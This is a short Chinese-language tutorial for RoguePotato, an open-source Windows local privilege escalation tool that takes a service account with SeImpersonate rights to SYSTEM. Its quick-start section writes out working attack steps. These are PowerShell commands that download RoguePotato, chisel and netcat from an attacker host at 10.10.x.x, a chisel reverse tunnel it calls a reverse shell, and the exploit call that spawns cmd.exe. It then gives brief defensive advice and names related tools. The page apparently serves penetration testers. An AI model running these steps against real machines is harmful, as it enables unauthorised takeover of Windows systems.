RoguePotato 开源项目教程

RoguePotato 开源项目教程

RoguePotatoAnother Windows Local Privilege Escalation from Service Account to System项目地址:https://gitcode.com/gh_mirrors/ro/RoguePotato

项目介绍

RoguePotato 是一个用于 Windows 权限提升的工具，它利用 SeImpersonate 或 SeAssignPrimaryToken 权限来获取系统级别的执行权限。与 JuicyPotato 不同，RoguePotato 在 Windows Server 2019 上也能有效工作。该项目由 antonioCoco 开发，并在 GitHub 上开源。

项目快速启动

环境准备

• 目标系统：Windows Server 2019
• 工具下载：RoguePotato.exe, chisel.exe, nc64.exe

快速启动步骤

1. 下载工具

   powershell -c wget http://10.10.x.x:8080/RoguePotato.exe -outfile RoguePotato.exe
   powershell -c wget http://10.10.x.x:8080/chiselx64.exe -outfile chisel.exe
   powershell -c wget http://10.10.x.x:8080/nc64.exe -outfile nc64.exe
   

2. 设置反向 shell

   chisel.exe client 10.10.x.x:8080 R:9999:127.0.0.1:9999
   

3. 运行 RoguePotato

   RoguePotato.exe -r 10.10.x.x -e "C:\windows\system32\cmd.exe" -l 9999
   

应用案例和最佳实践

应用案例

RoguePotato 主要用于渗透测试中，特别是在需要从服务账户提升到系统账户权限的场景。例如，在红队演练中，攻击者可能需要利用此工具来获取更高的系统权限以执行关键操作。

最佳实践

• 安全配置：确保目标系统上的 SeImpersonate 或 SeAssignPrimaryToken 权限被严格控制。
• 监控与日志：实施严格的系统监控和日志记录，以便及时发现和响应异常行为。
• 定期更新：保持系统和工具的最新状态，以防止已知漏洞被利用。

典型生态项目

相关项目

• JuicyPotato：一个类似的权限提升工具，但在 Windows Server 2019 上不再有效。
• PrintSpoofer：另一个权限提升工具，利用打印 spooler 服务的漏洞。
• SharpEfsPotato：结合了 EfsRpc 和 SeImpersonatePrivilege 的权限提升工具。

这些工具和项目共同构成了 Windows 权限提升领域的生态系统，为安全研究人员和渗透测试人员提供了丰富的资源。

RoguePotatoAnother Windows Local Privilege Escalation from Service Account to System项目地址:https://gitcode.com/gh_mirrors/ro/RoguePotato